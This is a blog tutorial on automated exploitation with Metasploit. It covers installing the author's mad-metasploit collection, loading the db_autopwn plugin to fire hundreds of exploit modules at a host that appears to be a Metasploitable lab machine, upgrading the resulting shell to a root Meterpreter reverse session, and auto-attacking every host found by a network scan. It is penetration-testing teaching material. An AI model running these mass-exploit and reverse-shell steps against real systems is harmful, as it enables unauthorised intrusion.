My first english article on blog! Please understand if I am wrong because English is not my native language.

This time is automation exploit with db_autopwn, mad-metasploit. Let’s start!

Mad-metasploit and db_autopwn

mad-metasploit is my project related to metasploit framework. To sum up…

Metasploit custom modules, plugins, resource script and.. awesome metasploit collection

and db_autopwn is automation exploit plugin on metasploit-framework. but it is deprecated.. :(

I keeping db_autopwn source code on my github repo, and added to mad-metasploit project! Now, let’s use Mad-Metasploit to launch an automated attack.

• https://github.com/hahwul/mad-metasploit
• https://github.com/hahwul/metasploit-autopwn

Mad Metasploit

Installation

First step

clone repo

git clone https://github.com/hahwul/mad-metasploit
cd mad-metasploit

and set config file.

vim config/config.rb

$metasploit_path = '/opt/metasploit-framework/embedded/framework/'
#                    /usr/share/metasploit-framework
#                   input your metasploit path

defined your msf path on config.rb

Second step

The mad-metasploit supports two modes. Interactive Mode, Commandline Mode But in fact, there is little difference between the two.(whether or not to set the pre-settings)

Interactive Mode

./mad-metasploit

Commandline Mode(preset all)

./mad-metasploit [-a/-y/--all/--yes]

At the end of this step, the module, plug-in of the mad-metasploit is installed in the metasploit-framework. If you need to delete it, you can remove it with the -r, --remove option.

Use db_autopwn in MSF

load db_autopwn. Enter load mad-metasploit/db_autopwn command in msfconsole

HAHWUL > load mad-metasploit/db_autopwn
[*] Successfully loaded plugin: db_autopwn

completed! db_autopwn is enabled in msfconsole.

Run db_autopwn for automation exploit

auto-exploit target. default command form is this

db_autopwn {target}`

I added several options for a more meaningful test. (db_autopwn options)

    -h          Display this help text
    -t          Show all matching exploit modules
    -x          Select modules based on vulnerability references
    -p          Select modules based on open ports
    -e          Launch exploits against all matched targets
    -r          Use a reverse connect shell
    -b          Use a bind shell on a random port (default)
    -q          Disable exploit module output
    -R  [rank]  Only run modules with a minimal rank
    -I  [range] Only exploit hosts inside this range
    -X  [range] Always exclude hosts inside this range
    -PI [range] Only exploit hosts with these ports open
    -PX [range] Always exclude hosts with these ports open
    -m  [regex] Only run modules whose name matches the regex
    -T  [secs]  Maximum runtime for any exploit in seconds

Enter command!

HAHWUL > db_autopwn -p -R great -e -q 192.168.56.101
[-] The db_autopwn command is DEPRECATED
[-] See http://r-7.co/xY65Zr instead
[*] (1/533 [0 sessions]): Launching exploit/freebsd/ftp/proftp_telnet_iac against 192.168.56.101:21...
[*] (2/533 [0 sessions]): Launching exploit/linux/ftp/proftp_sreplace against 192.168.56.101:21...
[*] (3/533 [0 sessions]): Launching exploit/linux/ftp/proftp_telnet_iac against 192.168.56.101:21...
[*] (4/533 [0 sessions]): Launching exploit/multi/ftp/wuftpd_site_exec_format against 192.168.56.101:21...
[*] (5/533 [0 sessions]): Launching exploit/unix/ftp/proftpd_133c_backdoor against 192.168.56.101:21...
[*] (6/533 [0 sessions]): Launching exploit/unix/ftp/vsftpd_234_backdoor against 192.168.56.101:21...
[*] (7/533 [0 sessions]): Launching exploit/windows/ftp/easyftp_cwd_fixret against 192.168.56.101:21...
[*] (8/533 [0 sessions]): Launching exploit/windows/ftp/easyftp_list_fixret against 192.168.56.101:21...
[*] (9/533 [0 sessions]): Launching exploit/windows/ftp/easyftp_mkd_fixret against 192.168.56.101:21...
....
[*]  >> autopwn module timeout from exploit/linux/http/pineapple_preconfig_cmdinject after 151.61710667610168 seconds
[*]  >> autopwn module timeout from exploit/linux/http/webcalendar_settings_exec after 150.63282704353333 seconds
[*]  >> autopwn module timeout from exploit/linux/http/trueonline_p660hn_v1_rce after 150.87934255599976 seconds
[*] (533/533 [1 sessions]): Waiting on 136 launched modules to finish execution...
[*]  >> autopwn module timeout from exploit/linux/http/sophos_wpa_sblistpack_exec after 151.77907156944275 seconds
[*]  >> autopwn module timeout from exploit/linux/http/pandora_fms_exec after 152.29020595550537 seconds`

I got a shell from exploit. let’s upgrade for a little more functionality. Upgrade shell to meterpreter!

HAHWUL  > use post/multi/manage/shell_to_meterpreter
HAHWUL post(shell_to_meterpreter) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
HAHWUL post(shell_to_meterpreter) > set SESSION 2
SESSION => 2
HAHWUL post(shell_to_meterpreter) > run

[*] Upgrading session ID: 2
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.56.1:4433
[*] Sending stage (826872 bytes) to 192.168.56.101
[*] Meterpreter session 3 opened (192.168.56.1:4433 -> 192.168.56.101:48732) at 2019-03-01 23:40:14 +0900
[*] Command stager progress: 100.00% (736/736 bytes)
[*] Post module execution completed
HAHWUL post(shell_to_meterpreter) > 
HAHWUL post(shell_to_meterpreter) > sessions -l

Active sessions
===============

  Id  Type                   Information                                                Connection
  --  ----                   -----------                                                ----------
  2   shell cmd/unix                                                                    192.168.56.1:38018 -> 192.168.56.101:19274 (192.168.56.101)
  3   meterpreter x86/linux  uid=0, gid=0, euid=0, egid=0 @ metasploitable.localdomain  192.168.56.1:4433 -> 192.168.56.101:48732 (192.168.56.101)

Nice!

If you use db and scan the band with db_nmap, the content is stored in db_host, which allows you to attempt attacks with multiple targets without specifying a host.

HAHWUL> db_nmap -PN {targets..}
HAHWUL> db_hosts

HAHWUL > db_autopwn -pb

Thank you for reading :)